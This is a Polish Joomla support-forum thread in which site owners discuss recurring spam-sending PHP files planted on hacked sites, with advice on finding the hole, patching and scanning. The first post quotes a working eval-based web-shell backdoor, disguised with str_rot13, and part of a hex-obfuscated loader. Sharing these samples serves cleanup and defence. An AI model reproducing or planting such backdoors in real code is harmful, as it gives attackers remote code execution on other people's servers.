Nadpisywane pliki php - wirusy ?
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 20

Temat: Nadpisywane pliki php - wirusy ?

  1. #1
    Nowicjusz
    Dołączył
    11-02-2013
    Wpisy
    21
    Punkty
    2

    Joomla! 3.4 Nadpisywane pliki php - wirusy ?

    Słuchajcie, od jakiegoś czasu mam problem ze stronami postawionymi na Joomli - a działam na niej ponad 3 lata.

    Na początku września administartor hostongu zgłosił mi informację że plik o nazwie user84.php zagnieżdżony w randomowym folderu wysyła spam.
    Plik oraz inne podejrzane (te które pojawiły się między datą aktualizacji a datą wykrycia ataku) pliki usunąłem.

    Teraz sytauacja pojawiła się znowu, znów pojawił się plik tym razem user42.php w innej witrynie którą mam na Joomli, na zupełnie innym szablonie.

    Pytanie 1, czy po ręcznym usunięciu plików, mogę zainstalować jakiś płatny component (np. RSFirewall) który będzie pilnował porządku, względnie informował o jakichś podejrzanych akcjach?

    Pytanie 2, czy udsotępnianie edytor JCE - osobom które uzupełniają treść strony jest dobrym pomysłem? Na tej pierwszej stronie, spotkałem się z sytacją że były wgrywane całe pliki z worda, to chyba słaby pomysł?

    Pliki z dziwnymi nadpisaniami (nazywają się np.:sort-47.php albo backup-90.php albo aJnkurDn.php porozrzucane po całym serwisie)

    Przykładowa treść:
    <?php if($_GET['test']){echo 'success';}else{($www= $_POST['f6q46']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}

    albo:
    <?php $GLOBALS['ve03'] = "\x2b\x42\x7b\x52\x5a\x6d\x76\x2a\x79\x74\x4f\xd\x 28\x31\x26\x51\x50\x2d\x46\x21\x54\x60\x45\x55\x36 \x7a\x5d\x37\x72\x4c\x23\x4e\x22\x5e\x34\x2f\x6e\x 75\x59\x44\x9\x53\x61\x39\x41\x3d\x77\x3b\x43\x56\ x24\x5f\x4d\x6b\x38\x2c\x3a\x40\x6f\x3e\x7d\x6c\x6 8\xa\x70\x5c\x5b\x47\x30\x27\x7c\x67\x33\x63\x29\x 62\x65\x20\x4b\x3f\x57\x35\x2e\x71\x48\x6a\x78\x25 \x58\x69\x32\x66\x4a\x7e\x3c\x64\x73\x49";
    $GLOBALS[$GLOBALS['ve03'][95].$GLOBALS['ve03'][43].$GLOBALS['ve03'][34].$GLOBALS['ve03'][72].$GLOBALS['ve03'][54].$GLOBALS['ve03'][81].$GLOBALS['ve03'][42]] = $GLOBALS['ve03'][73].$GLOBALS['ve03'][62].$GLOBALS['ve03'][28];



    Zaobserowałem ostatnio nasilenie takich akcji, czy ktoś ma na to receptę?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Nowicjusz
    Dołączył
    31-01-2012
    Wpisy
    19
    Punkty
    11

    Domyślny

    Na jakim hostingu masz serwis? Teraz własnie czyszczę stronę z obcych plików. Serwis postawiony na jakimś mało znanym hostingu (linux coś tam), joomla aktalizowana regularnia, dodatków prawie nie ma, działa admin tools który nic nie wykrył. Serwis rozsyłal spam ale przy czyszczeniu odkryłem jeszcze inny rodzaj infekcji. Dziura moze być po stronie serwera
    Pobierz serwis na dysk i przeskanuj, mogą tam się znaleźć pliki których nie podglądniesz

  4. #3
    Nowicjusz
    Dołączył
    31-12-2011
    Wpisy
    24
    Punkty
    19

    Domyślny

    @Father23

    ad. pytanie1: nie ta kolejność.
    Moim zdaniem właściwa kolejność to:
    1. znaleźć dziurę
    2. załatać dziurę
    3. oczyścić Joomlę
    4. zainstalować ochronę

    Co do ochrony - sam korzystam z Admin Tools Pro, on ma w opcjach ochrony skaner zmian w plikach m.in. PHP.
    Jest to ciekawa opcja, ale wymaga pewnej dyscypliny - włączenie ma sens na "zdrowej" witrynie, należy wykonywać regularnie, należy wykonać po każdej aktualizacji/instalacji core lub dodatku.
    Ewidentnie masz wirusa i należy zacząć od znalezienia dziury.

    jeśli pomogłem - poproszę o punkt

  5. #4
    Przeglądacz
    Dołączył
    12-07-2008
    Wpisy
    65
    Punkty
    10

    Domyślny

    Maccoo o hostingu, którym piszesz to linuxpl.com. Od wczoraj blokują mi stronę, bo ich antywirus coś wykrył. Napisali, że moja strona rozsyła spam. Joomla zaktualizowana do najnowszej wersji, dodatki również (aktualizacje, które się pokazały to zainstalowałem). Na koncie pojawiają się jakieś dziwne pliki z zakodowaną treścią i po ich usunięciu, odblokowali stronę. Tylko ile razy tak można.

  6. #5

  7. #6
    Nowicjusz
    Dołączył
    31-12-2011
    Wpisy
    24
    Punkty
    19

    Domyślny

    Linuxpl.com to nie znowu taki mało znany hosting. Korzystam od lat i raczej jestem zadowolony, także z supportu, który kiedyś znacząco mi pomógł po włamie na Joomlę.

    @pawciok1989:
    aktualizacje, które się pokazały to zainstalowałem
    Wszędzie sprawdzałeś? Niektóre dodatki pokazują, że wymagają aktualizacji dopiero gdy w zapleczu wejdziesz na zarządzanie nim.
    Ja miałem kiedyś włam przez dodatek, który... nigdzie nie pokazywał, że wymaga aktualizacji. Po prostu zakończyło się pewnego dnia rozwijanie go i tyle... A nie wpadłem na to, żeby sprawdzać także na stronie autora.
    Jeśli nie pozbędziesz się dziury - to te pliki będą pojawiać się znowu.

    jeśli pomogłem - poproszę o punkt

  8. #7
    Przeglądacz
    Dołączył
    12-07-2008
    Wpisy
    65
    Punkty
    10

    Domyślny

    Też korzystam z ich usług prywatnie i komercyjnie. Na razie co mogłem to zaktualizowałem. Niektóre dodatki faktycznie nie miały u producenta od dłuższego czasu aktualizacji. Jednak nie mogłem znaleźć czegoś podobnego z takimi funkcjami. Analizuję również logi, ale to dosyć mozolne szukanie. Odinstalowałem zbędne szablony i dodatki, więc pole zawęża się.

  9. #8
    Senior Gall Anonim awatar
    Dołączył
    19-10-2010
    Wpisy
    6 947
    Punkty
    447

    Domyślny

    @pawciok1989
    linuxpl.com - jest doskonałym dostwcą usługi o bardzo dużej elastyczności konfiguracji
    Korzystam z ich usług od lat - więc odrobinę doświadczenia mam - przez jakiś czas testowałem ich równolegle z posiadaniem usługi na nazwa.pl - kiedyś miałem coś na home.pl, był epizod z hekko i z czymś tam jeszcze - linuxpl.com w moim odczuciu wygrywa.
    Co do problemów które masz i tyi kolega - pomyśl czemu w przeciągu kilku ostatnich dni poszły aż trzy aktualiacje Joomla, pięć aktualizacji RS Firewalla, jak również AdminTools był aktualizowany. Został wymyślony przez "wesołą ekipę" sposób na wtrzyknięcie kodu i efektywnie wykorzystany przy pisaniu botów. W ostatnich paru dniach sypnęło się mnustwo witryn - zwłaszcza te pomiędzy Joomla 3.1.2 a 3.4.1. Joomla 1.5.26 została praktycznie nietknięta w tym czasie (albo nie dotarły do mnie zgłoszenia). Ogólnie niektóre niezaktualizowane witryny z niekatualizowaną Joomla jak i rozszerzeniami miały tak dużą ilość wstrzykniętych plików że można to było nazwać "wysypką". Przy okazji zaczełey korzystając z prox'y wysyłać dziką ilość wiadomości. Na chwilę obecną sytuacja wygląda na ogarniętą ale na samych aktualizacjach w ostatnim tygodniu miałem urwanie głowy - aczkolwiek nie sypneła mi się żadna witryna - chociaż nie powiem - wpadło nie mało dodatkowych grajcarów na święta za "leczenie".
    Więc akurat ja nie mam na co narzekać :-)

  10. #9
    Przeglądacz
    Dołączył
    12-07-2008
    Wpisy
    65
    Punkty
    10

    Domyślny

    @Gall Anonim
    Właśnie pisałem do linuxpl.com, żeby przeskanowali moje konto i wyszło, że na razie pusto. Jednak zastanawiam się czy jutro z jakiegoś miejsca nie zreplikuje się mi ponownie. Ogólnie gdyby nie hostingodawca to bym nie wiedział, że spamer siedzi u mnie na koncie, ponieważ witryna funkcjonuje jak zwykle, to po stronie serwera wyszło, że jest za duży ruch i idzie podejrzana wysyłka. Na szczęście nie podmienia plików, tylko tworzy swoje. Poniżej lokalizacje gdzie się zagnieździł i skąd usunąłem:

    administrator/components/com_banners/views/lib11.php

    plugins/system/sef/file.php

    administrator/components/com_phocagallery/libraries/javascript.php

    modules/mod_zoominfo/elements/object30.php

    i na deser:

    siedział w katalogu tmp również plik php. Nie pamiętam nazwy, ale go usunąłem. I tego pliku z katalogu tmp antywirus hostingodawcy nie widział.

    Zastanawiam się czy to ten plik z tmp rozsiewał czy muszę dalej szukać?

  11. #10
    Senior Gall Anonim awatar
    Dołączył
    19-10-2010
    Wpisy
    6 947
    Punkty
    447

    Domyślny

    Nie korzystam z softu hostingodawcy bo nie jest wyprofilowany na tego typ skrypty tylko na ochronę serwera i tak jest na każdym hoście - jeśli już niech podadzą logi - te pliki które przedstawiłeś nie są samotne - na 95% masz dopiski w plikach rdzenia - jeszcze jedno - bezkrytyczne usuwanie plików wskazanych jako zawirusowane jest kiepskim pomysłem ponieważ z rozpędu możesz usunąć rdzenny.
    Na deser - ściągnij sobie na komputer katalog images i przeszukaj pod kontem plików php :-)
    Ponieważ nie wiem jakich rozszerzeń używasz do zabezpieczeń i sprawdzania "niespodzianek" skorzystaj z https://myjoomla.com/

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Pliki PHP w treści artykułu - jak dodać?
    przez letnil na forum Administracja - ogólnie
    Odpowiedzi: 6
    Ostatni post/autor: 25-06-2015, 20:46
  2. Import bazy danych z PHP Version 5.5.12 do PHP 5.4
    przez Kwiot na forum Serwery lokalnie - JAMP, movAMP i inne
    Odpowiedzi: 4
    Ostatni post/autor: 28-03-2015, 20:17
  3. Uaktualnienie jwsig.php w Joomla 1.5 do wersji PHP 5.3
    przez redemers na forum Rozszerzenia - problemy z obsługą, zarządzaniem
    Odpowiedzi: 18
    Ostatni post/autor: 19-01-2013, 02:02
  4. błąd The requested URL /php-fcgi/php-fcgi-5.default/index.php was not found on this s
    przez majkigru na forum Instalacja, aktualizacja, migracje
    Odpowiedzi: 4
    Ostatni post/autor: 23-12-2011, 10:44
  5. Błąd includes/joomla.php on line 71 / version.php
    przez MemfiS na forum Instalacje (Joomla!, składników)
    Odpowiedzi: 10
    Ostatni post/autor: 29-07-2007, 16:18

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •